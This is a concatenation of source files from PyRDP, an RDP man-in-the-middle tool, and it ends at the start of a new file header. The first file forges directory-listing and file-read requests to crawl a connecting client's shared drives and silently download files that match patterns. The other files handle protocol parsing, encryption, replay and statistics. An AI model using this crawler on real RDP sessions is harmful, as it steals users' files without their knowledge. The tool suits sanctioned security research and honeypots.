#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
import fnmatch
from collections import defaultdict
from logging import LoggerAdapter
from pathlib import Path
from typing import Dict, List, Optional, Set

from pyrdp.enum.virtual_channel.device_redirection import DeviceType
from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM, DeviceRedirectionMITMObserver
from pyrdp.mitm.FileMapping import FileMapping
from pyrdp.mitm.config import MITMConfig
from pyrdp.mitm.state import RDPMITMState
from pyrdp.pdu import DeviceAnnounce


class VirtualFile:
    """
    Component used to simplify syntax and wrap common file and directory attributes
    """
    def __init__(self, deviceID: int, name: str, filePath: str, isDirectory: bool):
        """
        :param deviceID: ID of the device used.
        :param filePath: Unix-style path of the file.
        :param isDirectory: True if the file is a directory.
        """

        self.deviceID = deviceID
        self.name = name
        self.path = filePath
        self.isDirectory = isDirectory

class FileCrawlerMITM(DeviceRedirectionMITMObserver):
    """
    Component used to automatically crawl each shared drives based on user-configurable patterns.
    For each shared drives, we start by listing the root directory.

    When listing a directory, we queue up files and directory in different queues. If they matched a "match pattern",
        files go into the file download queue (matchedFileQueue),
        directories go in another download queue to be recursively downloaded (downloadDirectories),
        and unmatched directories goes in the unvisitedDirectory, to be crawled later.

    Directories matching an "ignore pattern" won't be added to the unvisitedDirectory queue.

    When listing a directory from downloadDirectories, each of the result are automatically
        flagged for download and put in the appropriate download queue.

    When done downloading files and directories, we do the same process for every unvisited directory in the unvisitedDirectory queue.
    """

    def __init__(self, mainLogger: LoggerAdapter, fileLogger: LoggerAdapter, config: MITMConfig, state: RDPMITMState):
        super().__init__()

        self.log = mainLogger
        self.fileLogger = fileLogger
        self.state = state
        self.config = config
        self.devices: Dict[int, VirtualFile] = {}
        self.deviceRedirection: Optional[DeviceRedirectionMITM] = None

        # Pending crawler requests
        self.directoryListingRequests: Dict[int, Path] = {}
        self.directoryListingLists = defaultdict(list)

        # Download management
        self.fileMappings: Dict[str, FileMapping] = {}
        self.downloadDirectories: Set[int] = set()

        # Crawler detection patterns
        self.matchPatterns: List[str] = []
        self.ignorePatterns: List[str] = []

        # Crawler queues
        self.matchedFileQueue: List[VirtualFile] = []
        self.matchedDirectoryQueue: List[VirtualFile] = []
        self.unvisitedDirectory: List[VirtualFile] = []
        self.unvisitedDrive: List[VirtualFile] = []

    def setDeviceRedirectionComponent(self, deviceRedirection: DeviceRedirectionMITM):
        """
        Sets a reference to the class we are currently observing. Can only observe one class.
        If uninitialized, load the patterns from the pattern files.
        :param deviceRedirection: Reference to the observed class.
        """
        if self.deviceRedirection:
            self.deviceRedirection.removeObserver(self)

        if deviceRedirection:
            deviceRedirection.addObserver(self)

        self.deviceRedirection = deviceRedirection
        if not self.matchPatterns and not self.ignorePatterns:
            self.preparePatterns()

    def preparePatterns(self):
        """
        Load patterns from either the default match files or the user-configured files.
        Should only be called once.
        """

        # Get the default file in pyrdp/mitm/crawler_config
        if self.config.crawlerMatchFileName:
            matchPath = Path(self.config.crawlerMatchFileName).absolute()
        else:
            matchPath = Path(__file__).parent.absolute() / "crawler_config" / "match.txt"
        
        if self.config.crawlerIgnoreFileName:
            ignorePath = Path(self.config.crawlerIgnoreFileName).absolute()
        else:
            ignorePath = Path(__file__).parent.absolute() / "crawler_config" / "ignore.txt"

        self.log.debug("Using match pattern file %(matchPath)s", {"matchPath": matchPath})
        self.matchPatterns = self.parsePatterns(matchPath)

        self.log.debug("Using ignore pattern file %(ignorePath)s", {"ignorePath": ignorePath})
        self.ignorePatterns = self.parsePatterns(ignorePath)

    def parsePatterns(self, path: str) -> List[str]:
        patternList = []
        try:
            with open(path, "r") as f:
                for line in f:
                    if not line or line[0] in ["#", " ", "\n"]:
                        continue

                    patternList.append(line.lower().rstrip())
        except Exception as e:
            self.log.exception(e)
            self.log.error("Failed to open file %(path)s", {"path": path})

        return patternList

    def onDeviceAnnounce(self, device: DeviceAnnounce):
        if device.deviceType == DeviceType.RDPDR_DTYP_FILESYSTEM:

            drive = VirtualFile(device.deviceID, device.preferredDOSName, "/", True)

            self.devices[drive.deviceID] = drive
            self.unvisitedDrive.append(drive)

            # If the crawler hasn't started, start one instance
            if len(self.devices) == 1:
                self.dispatchDownload()

    def dispatchDownload(self):
        """
        Processes each queue in order of priority.
        File downloads have priority over directory downloads.
        Crawl each folder before visiting another drive.
        """

        # Download a queued file
        if len(self.matchedFileQueue) != 0:
            file = self.matchedFileQueue.pop()
            self.downloadFile(file)

        # List a queued directory
        elif len(self.matchedDirectoryQueue) != 0:
            directory = self.matchedDirectoryQueue.pop()
            self.listDirectory(directory.deviceID, directory.path, True)

        # List an unvisited directory
        elif len(self.unvisitedDirectory) != 0:
            directory = self.unvisitedDirectory.pop()
            self.listDirectory(directory.deviceID, directory.path)

        # List an unvisited drive
        elif len(self.unvisitedDrive) != 0:
            drive = self.unvisitedDrive.pop()
            self.log.info("Begin crawling disk %(disk)s", {"disk" : drive.name})
            self.fileLogger.info("Begin crawling disk %(disk)s", {"disk" : drive.name})
            self.listDirectory(drive.deviceID, drive.path)
        else:
            self.log.info("Done crawling.")

    def listDirectory(self, deviceID: int, path: str, download: bool = False):
        """
        List the directory
        :param deviceID: Drive we are actually listing.
        :param path: Path of the directory we are listing.
        :param download: Wether or not we need to download this directory.
        """
        listingPath = str(Path(path).absolute()).replace("/", "\\")

        if not listingPath.endswith("*"):
            if not listingPath.endswith("\\"):
                listingPath += "\\"

            listingPath += "*"

        requestID = self.deviceRedirection.sendForgedDirectoryListing(deviceID, listingPath)

        # If the directory is flagged for download, keep trace of the incoming request to trigger download.
        if download:
            self.downloadDirectories.add(requestID)

        self.directoryListingRequests[requestID] = Path(path).absolute()

    def onDirectoryListingResult(self, deviceID: int, requestID: int, fileName: str, isDirectory: bool):
        if requestID not in self.directoryListingRequests:
            return

        path = self.directoryListingRequests[requestID]
        filePath = path / fileName

        file = VirtualFile(deviceID, fileName, str(filePath), isDirectory)
        directoryList = self.directoryListingLists[requestID]
        directoryList.append(file)

    def onDirectoryListingComplete(self, deviceID: int, requestID: int):
        self.directoryListingRequests.pop(requestID, {})

        # If directory was flagged for download
        if requestID in self.downloadDirectories:
            self.downloadDirectories.remove(requestID)
            self.addListingToDownloadQueue(requestID)
        else:
            self.crawlListing(requestID)

    def addListingToDownloadQueue(self, requestID: int):
        directoryList = self.directoryListingLists.pop(requestID, {})

        for item in directoryList:
            if item.name in ["", ".", ".."]:
                continue

            if item.isDirectory:
                self.matchedDirectoryQueue.append(item)
            else:
                self.matchedFileQueue.append(item)

        self.dispatchDownload()

    def crawlListing(self, requestID: int):
        """
        Match files and directories against the configured match and ignore patterns.
        :param requestID: The ID of the request containing the directory listing.
        """

        directoryList = self.directoryListingLists.pop(requestID, {})

        for item in directoryList:
            if item.name in ["", ".", ".."]:
                continue

            insensitivePath = item.path.lower()
            ignore = any(fnmatch.fnmatch(insensitivePath, p) for p in self.ignorePatterns)
            if ignore:
                continue

            matched = any(fnmatch.fnmatch(insensitivePath, p) for p in self.matchPatterns)
            if item.isDirectory:
                if matched:
                    self.log.info("Matched directory %(file)s", {"file" : item.path})
                    self.matchedDirectoryQueue.append(item)
                else:
                    self.unvisitedDirectory.append(item)
            else:
                if matched:
                    self.matchedFileQueue.append(item)

            self.fileLogger.info("%(file)s - %(isDirectory)s - %(isMatched)s", {
                "file" : item.path,
                "isDirectory": item.isDirectory,
                "isMatched": matched
            })

        self.dispatchDownload()

    def downloadFile(self, file: VirtualFile):
        remotePath = file.path
        mapping = FileMapping.generate(
            remotePath,
            self.config.fileDir,
            self.deviceRedirection.createDeviceRoot(file.deviceID),
            self.log
        )

        self.fileMappings[remotePath] = mapping
        self.deviceRedirection.sendForgedFileRead(file.deviceID, remotePath)

    def onFileDownloadResult(self, deviceID: int, requestID: int, path: str, offset: int, data: bytes):
        mapping = self.fileMappings[path]
        mapping.seek(offset)
        mapping.write(data)

    def onFileDownloadComplete(self, deviceID: int, requestID: int, path: str, errorCode: int):
        mapping = self.fileMappings.pop(path)
        mapping.finalize()

        if errorCode != 0:
            # TODO : Handle common error codes like :
            # 0xc0000022 : Permission error
            # Doc : https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/18d8fbe8-a967-4f1c-ae50-99ca8e491d2d

            self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. Error code: %(errorCode)s", {
                "remotePath": path,
                "errorCode": "0x%08lx" % errorCode,
            })

        self.dispatchDownload()



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from enum import IntEnum


class PlayerPDUType(IntEnum):
    """
    Types of events that we can encounter when replaying a RDP connection.
    """

    FAST_PATH_INPUT = 1  # Ex: scan codes, mouse, etc.
    FAST_PATH_OUTPUT = 2  # Ex: image
    CLIENT_INFO = 3  # Creds on connection
    SLOW_PATH_PDU = 4  # For slow-path PDUs
    CONNECTION_CLOSE = 5  # To advertise the end of the connection
    CLIPBOARD_DATA = 6  # To collect clipboard data
    CLIENT_DATA = 7  # Contains the clientName
    MOUSE_MOVE = 8  # Mouse move event from the player
    MOUSE_BUTTON = 9  # Mouse button event from the player
    MOUSE_WHEEL = 10  # Mouse wheel event from the player
    KEYBOARD = 11  # Keyboard event from the player
    TEXT = 12  # Text event from the player
    FORWARDING_STATE = 13  # Event from the player to change the state of I/O forwarding
    BITMAP = 14  # Bitmap event from the player
    DEVICE_MAPPING = 15  # Device mapping event notification
    DIRECTORY_LISTING_REQUEST = 16  # Directory listing request from the player
    DIRECTORY_LISTING_RESPONSE = 17  # Directory listing response to the player
    FILE_DOWNLOAD_REQUEST = 18  # File download request from the player
    FILE_DOWNLOAD_RESPONSE = 19  # File download response to the player
    FILE_DOWNLOAD_COMPLETE = 20  # File download completion notification to the player


class MouseButton(IntEnum):
    """
    Mouse button types
    """
    LEFT_BUTTON = 1
    RIGHT_BUTTON = 2
    MIDDLE_BUTTON = 3


#
# This file is part of the PyRDP project.
# Copyright (C) 2019, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.parser import Parser
from pyrdp.pdu import PDU


class RawParser(Parser):
    """
    This parser transforms bytes into raw PDUs.
    This is mostly for convenience and to make everything fit together.
    The use case for this is for layers with PDUs that we're not really interested in parsing.
    """

    def doParse(self, data: bytes) -> PDU:
        return PDU(data)

    def write(self, pdu: PDU) -> bytes:
        return pdu.payload


#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.layer import Layer
from pyrdp.parser.rdp.virtual_channel.dynamic_channel import DynamicChannelParser


class DynamicChannelLayer(Layer):
    """
    Layer to receive and send DynamicChannel channel (drdynvc) packets.
    """

    def __init__(self, parser = DynamicChannelParser()):
        super().__init__(parser)



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import time
from collections.abc import Mapping
from logging import LoggerAdapter
from typing import Optional


class STAT:
    """
    Type of statistics that a StatCounter object can hold.
    """

    CONNECTION_TIME = "connectionTime"
    # Duration (in secs) for the TCP connection

    CLIENT_SERVER_RATIO = "clientServerRatio"
    # Ratio of the # of messages coming from the client vs from the server. High value (>1) means high client interaction.

    TOTAL_INPUT = "totalInput"
    # # of messages coming from the client to the server.

    TOTAL_OUTPUT = "totalOutput"
    # # of messages coming from the server to the client.

    IO_INPUT = "input"
    # Packet coming from the client to the server for the io channel

    IO_INPUT_FASTPATH = "fastPathInput"
    # Packet coming from the client to the server for the io channel as a fastpath packet

    IO_INPUT_SLOWPATH = "slowPathInput"
    # Packet coming from the client to the server for the io channel as a slowpath packet

    IO_OUTPUT = "output"
    # Packet coming from the server to the client for the io channel

    IO_OUTPUT_FASTPATH = "fastPathOutput"
    # Packet coming from the server to the client for the io channel as a fastpath packet

    IO_OUTPUT_SLOWPATH = "slowPathOutput"
    # Packet coming from the server to the client for the io channel as a slowpath packet

    MCS = "mcs"
    # Packet Coming from either end for any channel

    MCS_OUTPUT = "mcsOutput"
    # Packet Coming from the server to the client for any channel

    MCS_OUTPUT_ = "mcsOutput_"
    # Packet Coming from the server to the client for a given channel (must append channel # after it)

    MCS_INPUT = "mcsInput"
    # Packet Coming from the client to the server for any channel

    MCS_INPUT_ = "mcsInput_"
    # Packet Coming from the client to the server for a given channel (must append channel # after it)

    VIRTUAL_CHANNEL = "virtualChannel"
    # Packet Coming from either end for any virtual channel that doesnt have a specific implementation (ex clipboard)

    VIRTUAL_CHANNEL_INPUT = "virtualChannelInput"
    # Packet Coming from the client to the server for any virtual channel that doesnt have a specific implementation (ex clipboard)

    VIRTUAL_CHANNEL_OUTPUT = "virtualChannelOutput"
    # Packet Coming from the server to the client for any virtual channel that doesnt have a specific implementation (ex clipboard)

    DEVICE_REDIRECTION = "deviceRedirection"
    # Packet coming from either end for the rdpdr channel

    DEVICE_REDIRECTION_CLIENT = "deviceRedirectionClient"
    # Packet coming from the client to the server for the rdpdr channel

    DEVICE_REDIRECTION_SERVER = "deviceRedirectionServer"
    # Packet coming from the server to the client for the rdpdr channel

    DEVICE_REDIRECTION_IOREQUEST = "deviceRedirectionIORequest"
    # IORequest packets for the rdpdr channel

    DEVICE_REDIRECTION_IORESPONSE = "deviceRedirectionIOResponse"
    # IOResponse packets for the rdpdr channel

    DEVICE_REDIRECTION_IOERROR = "deviceRedirectionIOError"
    # IO error packets for the rdpdr channel

    DEVICE_REDIRECTION_FILE_CLOSE = "deviceRedirectionFileClose"
    # File Close packets for the rdpdr channel

    DEVICE_REDIRECTION_FORGED_FILE_READ = "deviceRedirectionForgedFileRead"
    # File read packets forged by pyrdp for the rdpdr channel

    DEVICE_REDIRECTION_FORGED_DIRECTORY_LISTING = "deviceRedirectionForgedDirectoryListing"
    # Directory listing packets forged by pyrdp for the rdpdr channel

    CLIPBOARD = "clipboard"
    # Number of clipboard PDUs coming from either end

    CLIPBOARD_CLIENT = "clipboardClient"
    # Number of clipboard PDUs coming from the client

    CLIPBOARD_SERVER = "clipboardServer"
    # Number of clipboard PDUs coming from the server

    CLIPBOARD_COPY = "clipboardCopies"
    # Number of times data has been copied by either end

    CLIPBOARD_PASTE = "clipboardPastes"
    # Number of times data has been pasted by either end


class StatCounter:
    """
    Class that keeps track of various statistics during an RDP connection (See STAT)
    """

    def __init__(self):
        self.stats = {"report": 1.0}  # 1.0 = True

    def increment(self, *args: str):
        """
        Increments all statistics passed in arguments
        :param args: list of statistics to increment by one. See STAT for list of allowed values.
        """
        for stat in args:
            if stat not in self.stats:
                self.stats[stat] = 0
            self.stats[stat] += 1

    def incrementWith(self, statDestination: str, *statsSource: str):
        """
        Increments statDestination by all provided statSources
        """
        if statDestination not in self.stats:
            self.stats[statDestination] = 0
        for statSource in statsSource:
            if statSource in self.stats:
                self.stats[statDestination] += self.stats[statSource]

    def start(self):
        """
        Initialize some statistics such as connectionTime
        """
        self.stats[STAT.CONNECTION_TIME] = time.time()

    def stop(self):
        """
        Calculates the last statistics such as interaction ratio and connectionTime
        """
        self.stats[STAT.CONNECTION_TIME] = time.time() - self.stats[STAT.CONNECTION_TIME]
        self.incrementWith(STAT.TOTAL_INPUT, STAT.MCS_INPUT, STAT.IO_INPUT_FASTPATH, STAT.VIRTUAL_CHANNEL_INPUT, STAT.CLIPBOARD_CLIENT, STAT.DEVICE_REDIRECTION_CLIENT)
        self.incrementWith(STAT.TOTAL_OUTPUT, STAT.MCS_OUTPUT, STAT.IO_OUTPUT_FASTPATH, STAT.VIRTUAL_CHANNEL_OUTPUT, STAT.CLIPBOARD_SERVER, STAT.DEVICE_REDIRECTION_SERVER)
        if self.stats[STAT.TOTAL_OUTPUT] > 0:
            self.stats[STAT.CLIENT_SERVER_RATIO] = self.stats[STAT.TOTAL_INPUT] / self.stats[STAT.TOTAL_OUTPUT]

    def logReport(self, log: LoggerAdapter, more_info: Optional[Mapping] = None):
        """
        Create an INFO log message to log the Connection report using the keys in self.stats.
        :param log: Logger to use to log the report
        :param more_info: A dictionary-like object of more information to merge
                          in the connection report
        """
        # merge in the additional data if required
        if isinstance(more_info, Mapping):
            report_data = {**self.stats, **more_info}
        else:
            report_data = self.stats

        keys = ", ".join([f"{key}: %({key})s" for key in report_data.keys()])
        log.info(f"Connection report: {keys}", report_data)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import queue
from enum import IntEnum
from multiprocessing import Queue
from time import sleep

from PySide6.QtCore import QThread, Signal

from pyrdp.core import Timer
from pyrdp.player.Replay import Replay


class ReplayThreadEvent(IntEnum):
    """
    Types of messages that can be sent to the replay thread.
    """
    PLAY = 0
    PAUSE = 1
    SEEK = 2
    SPEED = 3
    EXIT = 4


class ReplayThread(QThread):
    """
    Thread that runs in the background for every replay. Constantly checks time to see which events should be played.
    """

    timeUpdated = Signal(float)

    # We use the object type instead of int for this signal to prevent Python integers from being converted to 32-bit integers
    eventReached = Signal(object)
    clearNeeded = Signal()

    def __init__(self, replay: Replay):
        super().__init__()

        self.queue = Queue()
        self.lastSeekTime = 0
        self.requestedSpeed = 1
        self.replay = replay
        self.timer = Timer()

    def run(self):
        step = 16 / 1000
        currentIndex = 0
        runThread = True
        timestamps = self.replay.getSortedTimestamps()

        while runThread:
            self.timer.update()

            try:
                while True:
                    event = self.queue.get_nowait()

                    if event == ReplayThreadEvent.PLAY:
                        self.timer.start()
                    elif event == ReplayThreadEvent.PAUSE:
                        self.timer.stop()
                    elif event == ReplayThreadEvent.SEEK:
                        if self.lastSeekTime < self.timer.getElapsedTime():
                            currentIndex = 0
                            self.clearNeeded.emit()

                        self.timer.setTime(self.lastSeekTime)
                    elif event == ReplayThreadEvent.SPEED:
                        self.timer.setSpeed(self.requestedSpeed)
                    elif event == ReplayThreadEvent.EXIT:
                        runThread = False

            except queue.Empty:
                pass

            if self.timer.isRunning():
                currentTime = self.timer.getElapsedTime()
                self.timeUpdated.emit(currentTime)

                while currentIndex < len(timestamps) and timestamps[currentIndex] / 1000.0 <= currentTime:
                    nextTimestamp = timestamps[currentIndex]
                    positions = self.replay.events[nextTimestamp]

                    for position in positions:
                        self.eventReached.emit(position)

                    currentIndex += 1

            sleep(step)

    def play(self):
        self.queue.put(ReplayThreadEvent.PLAY)

    def pause(self):
        self.queue.put(ReplayThreadEvent.PAUSE)

    def seek(self, time: float):
        self.lastSeekTime = time
        self.queue.put(ReplayThreadEvent.SEEK)

    def setSpeed(self, speed: float):
        self.requestedSpeed = speed
        self.queue.put(ReplayThreadEvent.SPEED)

    def close(self):
        self.queue.put(ReplayThreadEvent.EXIT)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.layer.buffered import BufferedLayer
from pyrdp.parser import TPKTParser
from pyrdp.pdu import PDU, TPKTPDU


class TPKTLayer(BufferedLayer):
    """
    Layer for handling TPKT-related traffic.
    """

    def __init__(self, parser = TPKTParser()):
        BufferedLayer.__init__(self, parser)

    def sendBytes(self, data: bytes):
        pdu = TPKTPDU(data)
        self.sendPDU(pdu)

    def shouldForward(self, pdu: PDU) -> bool:
        return True


#
# Copyright (c) 2014-2015 Sylvain Peyrefitte
# Copyright (c) 2018, 2019, 2022 GoSecure Inc.
#
# This file is part of rdpy and PyRDP.
#
# PyRDP is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#

"""
PER encoding / decoding functions
"""

from typing import BinaryIO, Tuple

from pyrdp.core.packing import Uint8, Uint16BE, Uint32BE


def readLength(s: BinaryIO) -> int:
    """
    Unpack a PER length indicator
    :param s: stream
    """
    byte = Uint8.unpack(s.read(1))

    if byte & 0x80:
        byte &= ~0x80
        return (byte << 8) + Uint8.unpack(s.read(1))
    else:
        return byte

def writeLength(value: int) -> bytes:
    """
    Pack a PER length indicator
    """
    if value > 0x7f:
        return Uint16BE.pack(value | 0x8000)
    else:
        return Uint8.pack(value)
    
def readChoice(s: BinaryIO) -> int:
    """
    Unpack a PER choice
    :param s: stream
    """
    return Uint8.unpack(s.read(1))

def writeChoice(choice: int) -> bytes:
    """
    Pack a PER choice
    :param choice: choice value
    """
    return Uint8.pack(choice)

def readSelection(s: BinaryIO) -> int:
    """
    Unpack a PER selection
    :param s: stream
    """
    return Uint8.unpack(s.read(1))

def writeSelection(selection: int) -> bytes:
    """
    Pack a PER selection
    :param selection: selection value
    """
    return Uint8.pack(selection)

def readNumberOfSet(s: BinaryIO) -> int:
    """
    Unpack a PER NumberOfSet
    :param s: stream
    """
    return Uint8.unpack(s.read(1))

def writeNumberOfSet(numberOfSet: int) -> bytes:
    """
    Pack a PER NumberOfSet
    :param numberOfSet: NumberOfSet value
    """
    return Uint8.pack(numberOfSet)

def readEnumeration(s: BinaryIO) -> int:
    """
    Unpack a PER enumeration format
    :param s: stream
    """
    return Uint8.unpack(s.read(1))

def writeEnumeration(enum: int) -> bytes:
    """
    Pack a PER enumeration
    :param enum: enumeration value
    """
    return Uint8.pack(enum)

def readInteger(s: BinaryIO) -> int:
    """
    Unpack a PER integer
    :param s: stream
    @raise InvalidValue: if the size of the integer is invalid
    """
    size = readLength(s)

    if size == 1:
        return Uint8.unpack(s.read(1))
    elif size == 2:
        return Uint16BE.unpack(s.read(2))
    elif size == 4:
        return Uint32BE.unpack(s.read(4))
    else:
        raise ValueError("invalid integer size %d" % size)

def writeInteger(value: int) -> bytes:
    """
    Pack a PER integer
    """
    if value <= 0xff:
        return writeLength(1) + Uint8.pack(value)
    elif value < 0xffff:
        return writeLength(2) + Uint16BE.pack(value)
    else:
        return writeLength(4) + Uint32BE.pack(value)

def readObjectIdentifier(s: BinaryIO):
    """
    Unpack a PER object identifier (tuple of 6 integers)
    :param s: stream
    :return: (int, int, int, int, int, int)
    """
    size = readLength(s)
    if size != 5:
        raise ValueError("Object identifier size must be 5 (got %d instead)" % size)
    
    a_oid = [0, 0, 0, 0, 0, 0]
    t12 = Uint8.unpack(s.read(1))
    a_oid[0] = t12 >> 4
    a_oid[1] = t12 & 0x0f
    a_oid[2] = Uint8.unpack(s.read(1))
    a_oid[3] = Uint8.unpack(s.read(1))
    a_oid[4] = Uint8.unpack(s.read(1))
    a_oid[5] = Uint8.unpack(s.read(1))
    return tuple(a_oid)

def writeObjectIdentifier(oid: Tuple[int, int, int, int, int, int]) -> bytes:
    """
    Pack a PER object identifier
    :param oid: object identifier (tuple of 6 integers)
    """
    return writeLength(5) + Uint8.pack((oid[0] << 4) & (oid[1] & 0x0f)) + b"".join(Uint8.pack(b) for b in oid[2 :])

def readNumericString(s: BinaryIO, minValue: int) -> str:
    """
    Unpack a PER numeric string
    :param s: stream
    :param minValue: minimum string length
    """
    length = readLength(s)
    length = (length + minValue + 1) // 2
    data = s.read(length)

    result = ""
    for b in data:
        c1 = (b >> 4) + 0x30
        c2 = (b & 0xf) + 0x30
        result += chr(c1) + chr(c2)
    
    return result

def writeNumericString(string: str, minValue: int) -> bytes:
    """
    Pack a PER numeric string
    :param string: numeric string
    :param minValue: minimum string length
    """
    length = len(string)
    mlength = minValue
    if length >= minValue:
        mlength = length - minValue
    
    result = b""
    
    for i in range(0, length, 2):
        c1 = ord(string[i : i + 1])
        if i + 1 < length:
            c2 = ord(string[i + 1 : i + 2])
        else:
            c2 = 0x30
        c1 = (c1 - 0x30) % 10
        c2 = (c2 - 0x30) % 10
        
        result += Uint8.pack((c1 << 4) | c2)
    
    return writeLength(mlength) + result

def readOctetStream(s: BinaryIO, minValue: int = 0) -> bytes:
    """
    Unpack a PER octet stream
    :param s: stream
    :param minValue: minimum string length
    """
    size = readLength(s) + minValue
    return s.read(size)

def writeOctetStream(bytes: bytes, minValue: int = 0) -> bytes:
    """
    Pack a PER octet stream
    :param bytes: octet stream
    :param minValue: minimum string length
    """
    length = len(bytes)
    mlength = minValue
    
    if length >= minValue:
        mlength = length - minValue
    
    return writeLength(mlength) + bytes

def writeOctetStreamAlternate(bytes: bytes) -> bytes:
    """
    Pack a PER octect stream with the alternate read length indicator
    :param bytes: octet stream
    Currently unused, implemented to match exactly what was sent by mstsc.exe
    on the wire.
    """
    length = len(bytes)
    return Uint16BE.pack(length | 0x8000) + bytes



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import LicensingPDUType
from pyrdp.pdu.pdu import PDU


class LicensingPDU(PDU):
    def __init__(self, header, flags):
        PDU.__init__(self)
        self.header = header
        self.flags = flags


class LicenseErrorAlertPDU(LicensingPDU):
    def __init__(self, flags, errorCode, stateTransition, blob):
        LicensingPDU.__init__(self, LicensingPDUType.ERROR_ALERT, flags)
        self.errorCode = errorCode
        self.stateTransition = stateTransition
        self.blob = blob


class LicenseBinaryBlob(PDU):
    def __init__(self, type, data):
        super().__init__()
        self.type = type
        self.data = data




#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import struct
import typing

from pyrdp.core.stream import StrictStream


class Integer:
    FORMAT = ""

    @classmethod
    def unpack(cls, data: typing.Union[bytes, typing.BinaryIO, StrictStream, int]) -> int:
        """
        Unpack an integer from its binary representation.
        :param data: data to unpack from.
        :return: the integer's value.
        """
        try:
            if isinstance(data, bytes):
                return struct.unpack(cls.FORMAT, data)[0]
            elif isinstance(data, int):
                # Indexing bytes in Python 3 gives you an int instead of bytes object of length 1...
                return data
            else:
                length = {"b": 1, "h": 2, "i": 4, "q": 8}[cls.FORMAT[1].lower()]
                return struct.unpack(cls.FORMAT, data.read(length))[0]
        except struct.error as e:
            raise ValueError(str(e))

    @classmethod
    def pack(cls, value: int, stream: typing.Optional[typing.BinaryIO] = None) -> bytes:
        """
        Pack an integer to its binary representation.
        :param value: value to pack.
        :param stream: stream to pack to (optional).
        :return: the bytes representing the integer.
        """
        bytes = struct.pack(cls.FORMAT, value)

        if stream is not None:
            stream.write(bytes)

        return bytes

# 8 bits
class Int8(Integer):
    FORMAT = "<b"

class Uint8(Integer):
    FORMAT = "<B"

# 16 bits
class Int16LE(Integer):
    FORMAT = "<h"

class Int16BE(Integer):
    FORMAT = ">h"

class Uint16LE(Integer):
    FORMAT = "<H"

class Uint16BE(Integer):
    FORMAT = ">H"

# 32 bits
class Int32LE(Integer):
    FORMAT = "<i"

class Int32BE(Integer):
    FORMAT = ">i"

class Uint32LE(Integer):
    FORMAT = "<I"

class Uint32BE(Integer):
    FORMAT = ">I"

class Uint64LE(Integer):
    FORMAT = "<Q"



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import Crypto.Random
from Crypto.PublicKey.RSA import RsaKey

from pyrdp.core import ObservedBy, Observer, Subject
from pyrdp.enum import EncryptionMethod
from pyrdp.exceptions import StateError
from pyrdp.security.crypto import RC4Crypter, RSA


class SecuritySettingsObserver(Observer):
    """
    Observer class for SecuritySettings.
    """

    def onCrypterGenerated(self, settings: 'SecuritySettings'):
        """
        Called when the SecuritySettings crypter has been generated.
        :param settings: the security settings object.
        """
        pass


@ObservedBy(SecuritySettingsObserver)
class SecuritySettings(Subject):
    """
    Class containing RDP standard security settings.
    """

    def __init__(self):
        Subject.__init__(self)
        self.encryptionMethod = None
        self.clientRandom = None
        self.serverRandom = None
        self.serverPublicKey = None
        self.clientCrypter = None
        self.serverCrypter = None

    def generateCrypters(self):
        """
        Generate a crypter with the current settings.
        """
        self.clientCrypter = RC4Crypter.generateClient(self.clientRandom, self.serverRandom, self.encryptionMethod)
        self.serverCrypter = RC4Crypter.generateServer(self.clientRandom, self.serverRandom, self.encryptionMethod)

        if self.observer:
            self.observer.onCrypterGenerated(self)

    def generateClientRandom(self):
        """
        Generate client random data.
        """
        self.setClientRandom(Crypto.Random.get_random_bytes(32))

    def generateServerRandom(self):
        """
        Generate server random data.
        """
        self.setServerRandom(Crypto.Random.get_random_bytes(32))

    def encryptClientRandom(self) -> bytes:
        """
        Encrypt the client random using the public key.
        """
        # plaintext is stored as little-endian but crypto functions expect it to be in big-endian format.
        return RSA(self.serverPublicKey).encrypt(self.clientRandom[:: -1])[:: -1]


    def setEncryptionMethod(self, encryptionMethod: EncryptionMethod):
        """
        Set the encryption method attribute.
        :param encryptionMethod: the encryption method.
        """
        self.encryptionMethod = encryptionMethod

    def setServerPublicKey(self, serverPublicKey: RsaKey):
        """
        Set the server's public key.
        :param serverPublicKey: the server's public key.
        """
        self.serverPublicKey = serverPublicKey

    def setServerRandom(self, random: bytes):
        """
        Set the serverRandom attribute.
        :param random: server random data.
        """
        self.serverRandom = random

        if self.clientRandom is not None and self.serverRandom is not None:
            self.generateCrypters()

    def setClientRandom(self, random: bytes):
        """
        Set the clientRandom attribute.
        :param random: client random data.
        """
        self.clientRandom = random

        if self.clientRandom is not None and self.serverRandom is not None:
            self.generateCrypters()

    def getClientCrypter(self) -> RC4Crypter:
        """
        Get the client crypter.
        """
        if self.clientCrypter is None:
            raise StateError("The crypters were not generated. The crypters will be generated when both the client and server random are received.")

        return self.clientCrypter

    def getServerCrypter(self) -> RC4Crypter:
        """
        Get the server crypter.
        """
        if self.serverCrypter is None:
            raise StateError("The crypters were not generated. The crypters will be generated when both the client and server random are received.")

        return self.serverCrypter





#
# This file is part of the PyRDP project.
